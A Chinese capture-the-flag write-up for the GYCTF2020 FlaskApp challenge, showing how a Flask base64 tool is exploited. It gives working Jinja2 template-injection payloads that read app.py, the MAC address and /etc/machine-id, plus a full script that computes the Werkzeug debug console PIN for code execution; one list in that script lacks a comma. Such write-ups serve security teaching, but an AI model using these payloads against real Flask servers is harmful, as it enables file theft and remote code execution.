[GYCTF2020]FlaskApp1

打开题目

简单的一个base64加解密小程序

查看提示,好像并没有什么用,题目是flask,可能是ssti模板注入

加密窗口{{7+7}},解密窗口e3s3Kzd9fQ== ({{7+7}}

加密窗口没看到注入,解密窗口存在注入,是模板注入

读取文件内容(将payload base64加密后输入解密窗口)

payload:{% for c in [].class.base.subclasses() %}{% if c.name=='catch_warnings' %}{{ c.init.globals['builtins'].open('app.py','r').read() }}{% endif %}{% endfor %}

得到

可得到waf函数,过滤了flag、os等

当在解密窗口输入非base64值时,会报错,说明开启了debug模式,我们可以计算pin码,利用pin码进入debug模式的交互式命令行进行命令的执行

同时可以得到文件路径

payload: {% for c in [].class.base.subclasses() %}{% if c.name=='catch_warnings' %}{{ c.init.globals['builtins'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

3a:f3:52:04:f2:e7

去掉冒号,转换成十进制得64816727519975

payload: {% for c in [].class.base.subclasses() %}{% if c.name=='catch_warnings' %}{{ c.init.globals['builtins'].open('/etc/machine-id','r').read() }}{% endif %}{% endfor %}

payload: 1408f836b0ca514d796cbf8960e45fa1

接下来试着编写脚本

复制代码
import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '64816727519975',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '1408f836b0ca514d796cbf8960e45fa1'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

获得pin:218-688-115

访问/console,输入刚才计算出得pin码,进入控制台

打开控制台

输入代码

得到flag

flag{f10f8240-2532-42d0-a780-55e50d9c8d54}

相关推荐
Immortal__y5 小时前
网络安全初级--搭建
安全·web安全
hans汉斯12 小时前
【计算机科学与应用】面向APT攻击调查的溯源图冗余结构压缩
网络·算法·安全·web安全·yolo·目标检测·图搜索算法
浮江雾15 小时前
SSRF9 各种限制绕过之域名限制绕过
网络·tcp/ip·安全·web安全·ssrf·绕过限制
小小工匠16 小时前
Web安全 - 基于 SM2/SM4 的前后端国产加解密方案详解
web安全·sm2/sm4·前后端国产加解密
桑晒.19 小时前
Webshell连接工具原理
安全·web安全·网络安全
mooyuan天天1 天前
DVWA靶场通关笔记-弱会话IDs(Weak Session IDs High级别)
web安全·dvwa靶场·弱会话id
Bulestar_xx1 天前
20250711_Sudo 靶机复盘
linux·安全·web安全
Fanmeang2 天前
2025江苏省信息安全管理与评估赛项二三阶段任务书
安全·web安全·信息安全管理与评估·神州数码·全国职业院校技能大赛·二三阶段
学习溢出3 天前
【网络安全】理解安全事件的“三分法”流程:应对警报的第一道防线
网络·安全·web安全·网络安全·ids
鹿鸣天涯3 天前
《红蓝攻防:构建实战化网络安全防御体系》
安全·web安全